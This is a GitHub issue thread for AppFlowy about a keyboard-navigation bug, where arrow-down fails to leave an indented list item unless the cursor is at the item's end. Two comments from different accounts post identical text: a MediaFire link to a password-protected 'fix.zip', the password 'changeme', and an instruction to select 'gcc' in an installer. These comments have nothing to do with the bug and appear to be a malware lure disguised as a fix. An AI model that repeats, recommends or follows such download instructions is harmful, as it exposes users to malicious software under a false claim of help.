### ISSUE TITLE
[Bug] you can't move from an indented to a non-indented list item using arrow-down unless you're at the end of the item, but you can using arrow-up.

### ISSUE THREAD

**Issue by annieappflowy** [AppFlowy-IO/AppFlowy#6077]
@annieappflowy @LucasXu0 I'd like to add that you can't move from an indented to a non-indented list item using arrow-down unless you're at the end of the item, but you can using arrow-up.

[Screencast from 2024-08-26 14-16-04.webm](https://github.com/user-attachments/assets/2f11ca7a-562c-4849-95d1-895e29dd34ad)

_Originally posted by @emmggi in https://github.com/AppFlowy-IO/AppFlowy/issues/5898#issuecomment-2310068884_

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
